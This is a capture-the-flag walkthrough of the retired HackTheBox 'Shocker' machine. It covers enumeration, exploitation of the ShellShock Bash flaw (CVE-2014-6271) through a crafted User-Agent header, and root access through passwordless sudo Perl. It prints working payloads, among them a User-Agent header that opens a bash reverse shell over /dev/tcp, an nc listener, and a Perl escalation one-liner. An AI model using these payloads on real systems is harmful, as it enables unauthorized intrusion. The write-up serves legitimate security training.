enter image description here

This was classified as an easy machine by mrb3n on HackTheBox. We will find a webpage on port 80 with an image, running a directory brute force on it with a trailing slash; we will find a user.sh. We will intercept this request, find out that it is vulnerable to ShellShock (CVE-2014-6271) and gain a foothold in the box. To privilege escalate, we will find that the user can run Perl as root, then we will run Perl to execute Bash.

OS Difficulty IP Address Status
Linux Easy Retired

Phase 1 - Enumeration


As usual, we start off with a Nmap to find out what ports are opened:

80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77🇩🇪cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see there’s only two ports opened: a webserver running Apache on port 80 and OpenSSH on port 2222.

Port 80

Opening up the webpage in the browser, we only get an image: enter image description here

Doing a directory brute force we find:

/cgi-bin/             (Status: 403) [Size: 294]

Doing another directory brute force on /cgi-bin/ we find:

/user.sh              (Status: 200) [Size: 119]

When we access user.sh, we can get an output that looks like the uptime command on Linux:

cat user.sh            
Content-Type: text/plain

Just an uptime test script

 20:40:25 up 27 min,  0 users,  load average: 0.00, 0.01, 0.00

Phase 2 - Exploitation


As the name of this box, ShellShock, suggests that it is vulnerable to ShellShock, AKA Bashdoor or CVE-2014-6271. This was a vulnerability discovered in Bash, back in 2014 which hash to with Bash syntax for defining functions.

Finding ShellShock

We can run a Nmap script scan to check for this:

nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-shellshock: 
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|     Disclosure date: 2014-09-24
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://seclists.org/oss-sec/2014/q3/685
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

Reading a bunch of different articles and fuzzing the /cgi-bin/user.sh parameter in Burp Suite, we find a method to execute commands on the box: enter image description here

The “User-Agent:” parameter can be abused by ShellShock and allow command execution:

User-Agent: () { :;}; echo; /usr/bin/id

We use echo because without it, it will return no value from the command. So let’s get a shell on ShellShock!

User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/ 0>&1
sudo nc -lvnp 443 
listening on [any] 443 ... 
connect to [] from (UNKNOWN) [] 45314 
bash: no job control in this shell 

[email protected]:/usr/lib/cgi-bin$

And we get in as the user shelly!

Phase 3 - Privilege Escalation

Perl for Root

Checking what commands the user shelly can run as root, we see /usr/bin/perl

[email protected]:/home/shelly$ sudo -l 
Matching Defaults entries for shelly on Shocker: 
    env_reset, mail_badpass,
User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl

Perl has a -e flag to execute from the command line, and it also has an exec command to run shell commands. Putting those two together we can run Bash as root.

[email protected]:/home/shelly$  sudo perl -e  'exec "/bin/bash"'  

[email protected]:/home/shelly#